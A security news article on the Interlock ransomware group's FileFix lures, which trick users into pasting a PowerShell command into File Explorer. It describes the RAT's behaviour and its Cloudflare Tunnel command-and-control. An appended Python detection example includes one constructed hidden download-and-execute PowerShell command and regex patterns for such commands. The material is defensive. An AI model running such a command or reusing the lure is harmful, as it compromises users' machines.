Redazione RHC : 16 July 2025 08:19
The Interlock ransomware group is distributing a remote access trojan (RAT) through compromised websites, using FileFix attacks to spread the malware. Like ClickFix, FileFix relies on social engineering, and several variations of these attacks have become common recently. Typically, victims are lured to fraudulent websites and tricked into copying and running malicious PowerShell commands; in other words, they infect their own systems by hand.
Attackers justify the need to run these commands by claiming they fix content display problems in the browser, or by asking the user to solve a fake CAPTCHA. Although ClickFix attacks most often target Windows users, who are tricked into running PowerShell commands, security researchers have already reported campaigns targeting macOS and Linux users as well.
According to ESET, the use of ClickFix as an initial access vector increased by 517% between the second half of 2024 and the first half of 2025. The FileFix technique, recently described by security researcher mr.d0x, is a variant of ClickFix, but it uses the more familiar Windows File Explorer interface instead of the command line.
In this scenario, the malicious page tells the user that they have been given access to a specific file; to find it, they supposedly have to copy the file path and paste it into Explorer. “The phishing page may contain an ‘Open File Explorer’ button, which, when clicked, will launch File Explorer (using the file upload feature) and copy the PowerShell command to the clipboard,” mr.d0x explained. This means that once the user pastes the supposed file path and presses Enter, the malicious PowerShell command is executed.
As early as May 2025, The DFIR Report and Proofpoint reported that the Interlock RAT was being distributed via KongTuke (also known as LandUpdate808), a sophisticated traffic distribution system (TDS) that delivered malware through a multi-stage process involving ClickFix and fake CAPTCHAs. It is now known that the hackers switched to FileFix in early June and began distributing the PHP variant of the Interlock RAT. The DFIR Report's analysts note that in some cases the Node.js variant of the malware is also being distributed.
Once executed, the RAT gathers system information using PowerShell commands and transmits it to its operators. The malware also checks the privileges of the logged-in user. The RAT then establishes a connection and awaits further commands. The researchers' report also notes that the attackers are clearly operating the malware manually: checking backups, browsing local directories and inspecting domain controllers. In some cases, the attackers used RDP to move laterally within compromised environments.
The malware uses trycloudflare[.]com as its command-and-control infrastructure, abusing the legitimate Cloudflare Tunnel service to hide its activity. The DFIR Report's representative believes this campaign is opportunistic.
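As an added illustration (example code, not from the article or the researchers it cites), the two observables the article gives a defender, a PowerShell process started from File Explorer as in the FileFix lure and DNS traffic to a trycloudflare[.]com tunnel hostname, can be checked against constructed Sysmon-style process records and DNS log lines. Every path, URL and hostname below is constructed for the example, and the explorer.exe parent is an assumption about how the pasted command is launched.

```python
"""Added example: flag PowerShell spawned by File Explorer with download/hidden
flags (the FileFix pattern) and DNS queries to Cloudflare Tunnel quick hostnames.
All records below are constructed, not real telemetry."""
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names).
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://placeholder.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
    {"ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
]

# Constructed DNS query log lines: "<timestamp> <client> <queried name>".
DNS_LINES = [
    "2025-06-02T10:00:01Z 10.0.0.21 update.microsoft.com",
    "2025-06-02T10:00:05Z 10.0.0.21 random-words-example.trycloudflare.com",
    "2025-06-02T10:00:09Z 10.0.0.22 trycloudflare.com.lookalike.test",
]

SHELL_RE = re.compile(r"\\(powershell|pwsh|cmd|mshta)\.exe$", re.I)
# Hidden window, encoded command, or in-memory download-and-run markers.
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|iwr |invoke-webrequest"
    r"|downloadstring|\biex\b", re.I)
# Match the tunnel domain itself or any subdomain, not lookalikes elsewhere in the name.
TUNNEL_RE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)

def filefix_suspects(events):
    """Return command lines of shells spawned by explorer.exe with suspicious flags."""
    hits = []
    for e in events:
        if (e["ParentImage"].lower().endswith(r"\explorer.exe")
                and SHELL_RE.search(e["Image"])
                and SUSPICIOUS_ARGS.search(e["CommandLine"])):
            hits.append(e["CommandLine"])
    return hits

def tunnel_queries(lines):
    """Return (client, qname) pairs for DNS queries under trycloudflare.com."""
    hits = []
    for line in lines:
        _ts, client, qname = line.split()
        if TUNNEL_RE.search(qname.rstrip(".")):
            hits.append((client, qname))
    return hits
```

A double-clicked .ps1 also has explorer.exe as parent, which is why the rule additionally requires hidden-window, encoded or download-and-execute arguments; tune the marker list to your environment's baseline.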